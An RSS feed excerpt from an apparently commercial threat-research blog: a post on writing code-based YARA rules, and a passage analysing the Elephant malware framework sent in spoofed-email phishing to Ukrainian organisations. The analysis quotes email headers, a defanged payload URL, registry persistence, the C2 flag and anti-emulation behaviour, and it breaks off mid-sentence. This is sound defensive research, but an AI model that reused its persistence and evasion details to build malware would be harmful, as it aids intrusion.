&lt;a href="#what-are-yara-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;YARA, short for &amp;ldquo;yet another recursive acronym,&amp;rdquo; is a tool used in malware
detection and classification. Malware researchers leverage YARA to create
descriptions of malware families based on textual or binary patterns. Each
description, or signature, is a YARA &amp;ldquo;rule&amp;rdquo; consisting of a set of strings and
a boolean expression to determine its logic. When written effectively, YARA
rules identify commonalities in malware and classify malicious files to other
forms of malware that display similar patterns. More advanced YARA rules can be
used to find additional variants of malware and hunt for samples.
(&lt;a href="#example-yara-rule-for-emotet-malware"&gt;Click here to jump down to examples of code-based YARA rules.&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;While most security vendors use their own signature mechanisms, YARA is an open
standard tool which can be used with many platforms and applied to different
use cases. For example, YARA enables an organization to create detections of
its own, which is relevant for identifying targeted malware that generic or
classic signatures often struggle to detect.&lt;/p&gt;
&lt;p&gt;This poses a significant advantage for security teams since they do not need to
wait for signature updates from their security vendors. Security teams can
create personalized, sophisticated YARA signatures even for targeted attacks
and custom created malware.&lt;/p&gt;
&lt;h3&gt;The Challenges in Writing Effective YARA Rules&lt;span class="hx:absolute hx:-mt-20" id="the-challenges-in-writing-effective-yara-rules"&gt;&lt;/span&gt;
&lt;a href="#the-challenges-in-writing-effective-yara-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The vast majority of YARA rules available today are simple-based rules focused
on string reuse found in a malware&amp;rsquo;s binary. Strings can include a log message
or hard-coded user agent, which are criteria not guaranteed to be unique.
Therefore they can result in false positives and can be easily replaced or
encrypted by the adversary to avoid detection.&lt;/p&gt;
&lt;p&gt;The most effective YARA rules are designed to achieve high detection and
classification rates while reducing the number of false positives. Researchers
must select the right textual or binary patterns to optimize detection results
and accurately classify a file to its respective malware family. This is
difficult because files share hundreds and even thousands of strings and it is
imperative that rules are not too generic nor too specific.&lt;/p&gt;
&lt;p&gt;For example, if a researcher is defining a YARA rule based on a file that
contains an embedded library, and the rule is based on the generic library
alone – which is not a malicious piece of code in itself – the researcher will
receive a hit on every single file that uses this library, in other words
increasing the number of false positives generated.&lt;/p&gt;
&lt;p&gt;The ideal signature will have the right balance: broad enough to identify many
variants of the malware but specific enough to avoid false positives.&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s an example:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The above example represents a file that has been disassembled into tiny pieces
of binary code, or genes. If a YARA rule is created based on the file&amp;rsquo;s trusted
code (green), many false positives will be generated.&lt;/p&gt;
&lt;p&gt;On the other hand, ensuring a YARA signature is not too specific is also
important. Taking a piece of code as it is, for example, and developing a rule
that contains all of the code&amp;rsquo;s addresses will make the YARA rule very specific
to this particular file only. The rule will not likely generate hits for other
or future variants of the malware that contain different values.&lt;/p&gt;
&lt;h3&gt;Writing Advanced YARA Rules is Difficult to Scale&lt;span class="hx:absolute hx:-mt-20" id="writing-advanced-yara-rules-is-difficult-to-scale"&gt;&lt;/span&gt;
&lt;a href="#writing-advanced-yara-rules-is-difficult-to-scale" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;More complex YARA rules can be created by incorporating features such as wild
cards (a type of hexadecimal string), case-insensitive strings, and regular
expressions. While advanced YARA rules can be powerful instruments for
detecting malware, writing them requires a high degree of technical ability and
an understanding of YARA, and can be a time-consuming process.&lt;/p&gt;
&lt;p&gt;Writing advanced YARA rules and
&lt;a href="https://intezer.com/blog/malware-analysis/the-role-of-malware-analysis-in-cybersecurity/"target="_blank" rel="noopener"&gt;malware analysis&lt;/a&gt;
in general is difficult to scale at high volumes, especially since not every
organization has access to a team of highly-skilled researchers or reverse
engineers. How can a security team create advanced YARA rules and still achieve
automation, especially if the organization is faced with a high volume of
alerts? The answer lies in studying patterns in code reuse.&lt;/p&gt;
&lt;h2&gt;Defining Code Reuse&lt;span class="hx:absolute hx:-mt-20" id="defining-code-reuse"&gt;&lt;/span&gt;
&lt;a href="#defining-code-reuse" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Almost every software or malware today contains previously written code.
Developers of trusted applications will employ code reuse to make their work
more efficient and to bring tools to market faster. The same approach applies
for malware authors. As attackers write more malware they will establish code
patterns. For defenders, this provides an opportunity for attribution and
identifying threat actor capabilities.&lt;/p&gt;
&lt;p&gt;Genetic analysis of threats breaks down a given file into thousands of tiny
fragments of code, or genes. Identifying code that was used in previous attacks
can provide critical insights for security teams, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Accurately determining the intent of the software. For example, is the file
trusted or malicious?&lt;/li&gt;
&lt;li&gt;Classifying a malicious file to its relevant malware family.&lt;/li&gt;
&lt;li&gt;Uncovering the level of sophistication and potential risk of the threat. For
example, are you dealing with
&lt;a href="https://intezer.com/blog/research/mitigating-emotet-the-most-common-banking-trojan/"target="_blank" rel="noopener"&gt;a common banking trojan&lt;/a&gt;,
a sophisticated APT or a nation-state sponsored attack? The answer will shape
your response.&lt;/li&gt;
&lt;li&gt;Making attribution to the threat actor responsible for creating the malware.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Not only can studying patterns in code reuse identify the origin of any given
file, it can highlight unique, never-before-seen code, which can detect new
threats that have been written from scratch.&lt;/p&gt;
&lt;h2&gt;Generate Automatic, Advanced YARA Rules with Code Reuse&lt;span class="hx:absolute hx:-mt-20" id="generate-automatic-advanced-yara-rules-with-code-reuse"&gt;&lt;/span&gt;
&lt;a href="#generate-automatic-advanced-yara-rules-with-code-reuse" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Just as attackers reuse code to deploy new malware, defenders can identify
patterns in code reuse to create advanced YARA rules. Here&amp;rsquo;s how:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;By identifying a malicious file&amp;rsquo;s unique binary code, a signature can be
produced for detecting only those genes. This will enable detection of the
exact same malware with high confidence and a low false positive rate.&lt;/li&gt;
&lt;li&gt;Detecting samples of the same variants (the same opcodes with different
addresses) can be replaced with wildcards.&lt;/li&gt;
&lt;li&gt;Detecting different variants of the same malware family or campaign (same
baseline of code but with different functionalities or capabilities) to look
for a partial match.&lt;/li&gt;
&lt;li&gt;Detecting future variants that the attacker may release based on code reuse.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let&amp;rsquo;s look at that example again:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;As demonstrated in the previous example, creating a YARA rule based on a file&amp;rsquo;s
trusted code will result in false positives. At the same time, developing a
rule that contains all of the code&amp;rsquo;s addresses will make the rule very specific
to this particular file only. The rule will not likely generate hits for other
or future variants of the malware that contain different values.&lt;/p&gt;
&lt;p&gt;By identifying the malicious (red) and unique code (purple), a researcher can
create a YARA rule that will achieve very accurate results. With a YARA rule
based on code reuse, you can expect to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receive hits on different hashes that contain the exact same code.&lt;/li&gt;
&lt;li&gt;Receive hits on different hashes that contain some but not all of the
original code. This is useful for identifying new variants that are similar
to the malware that the signature is based on.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Example YARA Rule for Emotet Malware&lt;span class="hx:absolute hx:-mt-20" id="example-yara-rule-for-emotet-malware"&gt;&lt;/span&gt;
&lt;a href="#example-yara-rule-for-emotet-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The following example demonstrates a code-based YARA rule produced for
&lt;a href="https://analyze.intezer.com/families/db6abbcc-d292-4991-bc90-207c077f5e53"target="_blank" rel="noopener"&gt;Emotet&lt;/a&gt;,
a common financial trojan. With the code-based YARA signature in place, any
future sample or variant that reuses some aspects of Emotet&amp;rsquo;s code will be
detected.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig2.png" title="Example YARA rule, generated by Intezer to detect Emotet." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Example YARA rule, generated by Intezer to detect Emotet.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig3.png" title="Intezer analysis of Emotet, with red box highlighting the button to generate a code-based YARA signature (SHA256: 5f2aa0bb76749cce2c13c1049521a3e70389c773632245e1f915ca6c522d1402)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Intezer analysis of Emotet, with red box highlighting the button to generate a code-based YARA signature (SHA256: 5f2aa0bb76749cce2c13c1049521a3e70389c773632245e1f915ca6c522d1402)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Example YARA Rule for WannaCry Variant2&lt;span class="hx:absolute hx:-mt-20" id="example-yara-rule-for-wannacry-variant2"&gt;&lt;/span&gt;
&lt;a href="#example-yara-rule-for-wannacry-variant2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;This is an example of a YARA signature that was produced via code from a
&lt;a href="https://analyze.intezer.com/families/0b13c0d4-7779-4c06-98fa-4d33ca98f8a9"target="_blank" rel="noopener"&gt;WannaCry&lt;/a&gt;
sample. Deployed in May 2017, WannaCry was one of the largest, high profile
ransomware attacks in history, infecting over 200,000 computers across 150
countries.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig4.png" title="Example YARA rule for WannaCry." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Example YARA rule for WannaCry.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig5.png" title="Genetic analysis of WannaCry in Intezer Analyze (SHA256: bf293bda73c5b4c1ec66561ad20d7e2bc6692d051282d35ce8b7b7020c753467)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Genetic analysis of WannaCry in Intezer Analyze (SHA256: bf293bda73c5b4c1ec66561ad20d7e2bc6692d051282d35ce8b7b7020c753467)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Generating YARA Rules with Intezer Analyze&lt;span class="hx:absolute hx:-mt-20" id="generating-yara-rules-with-intezer-analyze"&gt;&lt;/span&gt;
&lt;a href="#generating-yara-rules-with-intezer-analyze" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Leveraging proprietary genetic code analysis technology, Intezer Analyze can
generate automatic YARA signatures based on a file&amp;rsquo;s code, enabling users to
improve their threat hunting capabilities by detecting future variants of the
malware. As highlighted above, code-based YARA signatures can effectively
reduce false positives and save precious resources in the form of time and
analyst efforts. This is particularly valuable for organizations dealing with a
large volume of alerts.&lt;/p&gt;
&lt;p&gt;You can also use
&lt;a href="https://intezer.com/blog/threat-hunting/scale-incident-response-detection-engineering/"target="_blank" rel="noopener"&gt;Detect &amp;amp; Hunt&lt;/a&gt;
to find file-based detection opportunities for creating new YARA rules. You can
filter these detection opportunities by the artifact type, family, and verdict.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/yara-rules-minimize-false-positives/images/fig6.png" title="NanoCoreRAT sample, SHA256: 0689544cd227b93df10df4d99ea04270d0f9f76259aa34cb8f6707a02e70081d" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;NanoCoreRAT sample, SHA256: 0689544cd227b93df10df4d99ea04270d0f9f76259aa34cb8f6707a02e70081d&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This feature also allows for some more advanced usages. It can be used in
several scenarios, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The user can adjust the thresholds of the rule. The default value is 70% of
the entire code but it is possible to modify the rule to be more specific, or
more flexible.&lt;/li&gt;
&lt;li&gt;The user can combine or split different YARA signatures to build stronger
rules to better fit his or her needs.&lt;/li&gt;
&lt;li&gt;The user can add to the automated rules with a string reuse feature to make
the signature even more powerful for threat hunting.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Key Takeaways for Writing Effective Rules&lt;span class="hx:absolute hx:-mt-20" id="key-takeaways-for-writing-effective-rules"&gt;&lt;/span&gt;
&lt;a href="#key-takeaways-for-writing-effective-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;Incorporating YARA into daily security operations can accelerate incident
response time, classify malware, empower threat intelligence and improve
detection capabilities by creating custom signatures.&lt;/li&gt;
&lt;li&gt;Traditional methods for writing effective YARA signatures have their
challenges, including being too specific or generic with respect to a file&amp;rsquo;s
textual or binary patterns.&lt;/li&gt;
&lt;li&gt;In today&amp;rsquo;s YARA landscape many signatures are based on string reuse. The
challenge is to identify the &amp;ldquo;unique&amp;rdquo; strings, however even if this is
achieved, these signatures are much less effective because strings can be
easily manipulated, replaced or encrypted by the adversary to avoid
detection.&lt;/li&gt;
&lt;li&gt;Identifying malicious code seen in previous threats can be used to generate
more accurate YARA signatures for detecting future variants or new malware.&lt;/li&gt;
&lt;li&gt;The Intezer Analyze platform enables users to automatically generate YARA
rules based on binary code, rather than simple strings. Code-based YARA rules
are the most effective since they are tolerant to modifications and are more
equipped to detect variants of the same threat.&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Elephant Framework Delivered in Phishing Attacks Against Ukrainian Organizations</title><link>https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/</link><pubDate>Mon, 04 Apr 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/</guid><description>
&lt;p&gt;A recently developed malware framework called Elephant is being delivered in
targeted spear phishing campaigns using spoofed Ukrainian governmental email
addresses. The four malware components delivered are used for stealing
credentials, documents, and to provide remote access to the infected machine.&lt;/p&gt;
&lt;p&gt;Two of these components were first reported on by the Computer Emergency
Response Team for Ukraine (CERT-UA) in March 2022. They named the two
components GraphSteel and GrimPlant. When investigating these events, we have
identified that Elephant has also been delivered via phishing emails from
spoofed Ukrainian email addresses. Elephant is a malware framework written in
Go. The activity has been attributed to UAC-0056 (TA471, SaintBear, UNC2589) by
CERT-UA.&lt;/p&gt;
&lt;h2&gt;Background&lt;span class="hx:absolute hx:-mt-20" id="background"&gt;&lt;/span&gt;
&lt;a href="#background" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;On March 12, the CERT-UA
&lt;a href="https://cert.gov.ua/article/37704"target="_blank" rel="noopener"&gt;published an alert&lt;/a&gt; on a threat about
phishing emails sent on behalf of state bodies of Ukraine that urged the
recievers to update the system by using a link provided in the email. Once the
user opens the link two files are downloaded, one is Cobalt Strike Beacon the
other is a dropper that will download and execute two additional files. These
additional files are base64 encoded, the files saved as:
&lt;code&gt;microsoft-cortana.exe&lt;/code&gt; (classified as GraphSteel) and &lt;code&gt;oracle-java.exe&lt;/code&gt;
(GrimPlant backdoor). The attack used Discord as a hosting server for the
additional payload that was downloaded.&lt;/p&gt;
&lt;p&gt;On March 15, SentinelOne
&lt;a href="https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/"target="_blank" rel="noopener"&gt;found&lt;/a&gt;
two more samples of the GraphSteel and GrimPlant malware families. These
samples written in Go were dropped by an executable that was disguised as a
translation application. The new samples are similar to those published by the
CERT-UA, both in the naming and the functionality.&lt;/p&gt;
&lt;p&gt;On March 28, CERT-UA published
&lt;a href="https://cert.gov.ua/article/38374"target="_blank" rel="noopener"&gt;another alert&lt;/a&gt; about phishing emails with
an attached &amp;ldquo;xls&amp;rdquo; file. The subject of the email and the file name are both
&amp;ldquo;Wage arrear&amp;rdquo;. The attached file had macros that, once executed, created a file
called &lt;code&gt;Base-Update.exe&lt;/code&gt; – a malware that downloads and executes two other
files classified as GraphSteel and GrimPlant by the CERT.&lt;/p&gt;
&lt;h2&gt;Phishing Email&lt;span class="hx:absolute hx:-mt-20" id="phishing-email"&gt;&lt;/span&gt;
&lt;a href="#phishing-email" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;The subject of the email: Заборгованість по зарплаті (arrears in wages).&lt;/li&gt;
&lt;li&gt;The email was sent from &lt;code&gt;zam@mdfi.gov.ua&lt;/code&gt; to &lt;code&gt;ilenko@gng.com.ua&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The sender domain &lt;code&gt;mdfi.gov.ua&lt;/code&gt; belongs to the Mykolayiv Regional
Phytosanitary Laboratory.&lt;/li&gt;
&lt;li&gt;The
&lt;a href="https://uhmi.org.ua/eng/conf/entln/list_of_participants/#:~:text=ilenko%40gng.com.ua%20ilenko%40gng.com.ua%2028.%20vyacheslav%20petrovych%20tretyak%2C%20head%20of%20department%20of%20technical%20supply"target="_blank" rel="noopener"&gt;receiver&lt;/a&gt;
is the Head of Department of Technical Supply in
&lt;a href="https://www.okko-group.com.ua/en/companies/okko"target="_blank" rel="noopener"&gt;OKKO Group&lt;/a&gt;, one of the
largest filling stations in Ukraine, this person is in charge of the gas
stations chain.&lt;/li&gt;
&lt;li&gt;Based on the headers of the email: the email was sent from &lt;code&gt;87.249.139.161&lt;/code&gt;
(hosting web server located in Turkey).&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;zam@mdfi.gov.ua&amp;gt;
Received: from hosting30.ukrnames.com (hosting30.ukrnames.com [217.182.197.11])
by mx-fm0.gng.com.ua with ESMTP id 22RJjl16017368-22RJjl18017368
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO)
for &amp;lt;ilenko@gng.com.ua&amp;gt;; Sun, 27 Mar 2022 22:45:47 &amp;#43;0300
Received: from [87.249.139.161] (port=15731 helo=WIN3ISR1T95E6Qwwwtendawificom)
by hosting30.ukrnames.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.95)
(envelope-from &amp;lt;zam@mdfi.gov.ua&amp;gt;)
id 1nYYot-00AQaf-Gj
for ilenko@gng.com.ua;
Sun, 27 Mar 2022 22:45:47 &amp;#43;0300
MIME-Version: 1.0
From: &amp;#34;zam@mdfi.gov.ua&amp;#34; &amp;lt;zam@mdfi.gov.ua&amp;gt;
Reply-To: zam@mdfi.gov.ua
To: ilenko@gng.com.ua
...
X-Mailer: Smart_Send_4_4_2
Date: Sun, 27 Mar 2022 12:44:30 -0700
Message-ID: &amp;lt;127804766552081718123841@WIN-3ISR1T95E6Q&amp;gt;
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - hosting30.ukrnames.com
X-AntiAbuse: Original Domain - gng.com.ua
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - mdfi.gov.ua
X-Get-Message-Sender-Via: hosting30.ukrnames.com: authenticated_id: zam@mdfi.gov.ua
X-Authenticated-Sender: hosting30.ukrnames.com: zam@mdfi.gov.ua
X-Source:
X-Source-Args:
X-Source-Dir:
X-FE-Attachment-Name: =?UTF-8?B?x&amp;#43;Dh7vDj7uLg7bPx8vwg7&amp;#43;4g5&amp;#43;Dw7&amp;#43;vg8rMueGxz?=
X-FEAS-SBL: 87.249.139.161 score 1
X-FE-Policy-ID: 2:1:4:gng.com.ua
X-FE-Orig-Env-Rcpt: ilenko@gng.com.ua
X-FE-Orig-Env-From: zam@mdfi.gov.ua
X-FEAS-Client-IP: 217.182.197.11&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;While reviewing the email&amp;rsquo;s transport path, we noticed that the domain
&lt;code&gt;mdfi.gov.ua&lt;/code&gt; did not have a configured SPF record to prevent email spoofing.
An SPF record is used to restrict which IP addresses are allowed to send emails
for a specific domain. If this record is not set, any IP address is technically
allowed to send emails using that domain name. Some email providers do warn
when they receive an email from an address that doesn&amp;rsquo;t have an SPF record. The
screenshot below shows the warning message displayed in GMail when reading such
email.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Our theory is that the threat actor exploited this vulnerability to send
spoofed phishing emails to their targets. We reported the issue to CERT-UA.&lt;/p&gt;
&lt;p&gt;We
&lt;a href="https://www.virustotal.com/gui/ip-address/87.249.139.161/relations"target="_blank" rel="noopener"&gt;followed&lt;/a&gt;
the sender IP address and found three other emails: two emails submitted on
March 29 from Ukraine targeting ICTV, a Ukrainian TV channel and the third
email was submitted in February from Romania. The emails that target UA have
the same subject and use the same attached xls file that delivers the first
malicious payload.&lt;/p&gt;
&lt;h2&gt;The Elephant Framework&lt;span class="hx:absolute hx:-mt-20" id="the-elephant-framework"&gt;&lt;/span&gt;
&lt;a href="#the-elephant-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The malware that is dropped by the phishing lure is the dropper component of
what we call the &amp;ldquo;Elephant Framework.&amp;rdquo; The framework consists of four
components that work in unison. The code snippet below shows a reconstruction
of the source code tree, bold indicating folders, showing how the different
components have been organized. The location of the implant&amp;rsquo;s entrypoint is
unknown and has been guessed to be in the root folder. As there are also server
components to the framework, we hypothesize that there are more folders for the
two servers used by the framework.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;Dropper Component&lt;span class="hx:absolute hx:-mt-20" id="dropper-component"&gt;&lt;/span&gt;
&lt;a href="#dropper-component" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;While called the dropper in the framework, this component does not have an
embedded payload. Instead it is technically a downloader that fetches the next
stage called the &amp;ldquo;downloader.&amp;rdquo; The next stage is downloaded from the URL
&lt;code&gt;hxxp://194.31.98.124:443/i&lt;/code&gt; and saved to the user&amp;rsquo;s home directory
(&lt;code&gt;%HOME%/.java-sdk/java-sdk.exe&lt;/code&gt;). The next stage is executed with the command
line flag &lt;code&gt;-a 0CyCcrhI/6B5wKE8XLOd+w==&lt;/code&gt;, base64 and AES encrypted information
about the C2 server.&lt;/p&gt;
&lt;h3&gt;Downloader Component&lt;span class="hx:absolute hx:-mt-20" id="downloader-component"&gt;&lt;/span&gt;
&lt;a href="#downloader-component" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The &amp;ldquo;downloader&amp;rdquo; acts as an orchestrator for the other components. In addition
to downloading the &amp;ldquo;client&amp;rdquo; and the &amp;ldquo;implant&amp;rdquo; components, it also sets up
persistence and can perform updates. Like all the other components, before any
malicious activity is taken it performs some evasion techniques. The difference
between this component and the others is that this one is using code from the
&lt;a href="https://github.com/redcode-labs/Coldfire"target="_blank" rel="noopener"&gt;ColdFire project on GitHub&lt;/a&gt;. The
screenshot below shows the malware using the &lt;code&gt;Wait&lt;/code&gt; function to sleep for 10
seconds before allocating 200 mb of garbage data.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Persistence is established by adding a new key entry with the name &lt;code&gt;Java-3DK&lt;/code&gt;
to the registry key &lt;code&gt;SoftwareMicrosoftWindowsCurrentVersionRun&lt;/code&gt;. After this,
the malware checks if a new binary exists by comparing its MD5 hash with a hash
from the server. If no update is needed, it downloads the other two components.&lt;/p&gt;
&lt;p&gt;The downloader has some 3rd party libraries, whose metadata are listed in the
binary, that are not used. All the 3rd party libraries are listed in the code
snippet below. In the list for example &lt;code&gt;port-scanner&lt;/code&gt;, &lt;code&gt;gopacket&lt;/code&gt;, and
&lt;code&gt;gateway&lt;/code&gt; packages are not being used. These are all libraries to facilitate
lateral movement. It is not clear if these are left-overs from an older version
of the malware or hints of future functionality.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770
github.com/dustin/go-humanize v1.0.0
github.com/fatih/color v1.10.0
github.com/google/gopacket v1.1.19
github.com/google/gopacket/layers v1.1.19
github.com/google/gopacket/pcap v1.1.19
github.com/jackpal/gateway v1.0.7
github.com/jcmturner/aescts v2.0.0&amp;#43;incompatible
github.com/mattn/go-colorable v0.1.8
github.com/mattn/go-isatty v0.0.12
github.com/minio/minio/pkg/disk v0.0.0-20210213070509-a94a9c37faf5
github.com/mitchellh/go-ps v1.0.0
github.com/redcode-labs/ColdFire v0.0.0-20210118141151-d4d62410b029
github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8
github.com/savaki/jq/scanner v0.0.0-20161209013833-0e6baecebbf8
golang.org/x/sys/windows v0.0.0-20210119212857-b64e53b001e4
golang.org/x/sys/windows/registry v0.0.0-20210119212857-b64e53b001e4&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig4.png" title="Analysis of the Elephant downloader (https://analyze.intezer.com/files/8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Analysis of the Elephant downloader (https://analyze.intezer.com/files/8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Implant Component (GrimPlant)&lt;span class="hx:absolute hx:-mt-20" id="implant-component-grimplant"&gt;&lt;/span&gt;
&lt;a href="#implant-component-grimplant" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;GrimPlant is a backdoor that allows the operator to execute arbitrary
PowerShell scripts on the infected machine. The backdoor has a relatively small
set of functionality, for example it doesn&amp;rsquo;t have any persistence functionality
on its own. When the malware first is executed, it allocates 200 mb and sleeps
for 10 seconds, the function shown in the screenshot below. This is an
anti-emulation technique that has been found in other malware written in Go.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The Command and Control (C2) address is not included in the binary. Instead it
is passed in to the malware via the command line flag &lt;code&gt;-addr&lt;/code&gt;. The address is
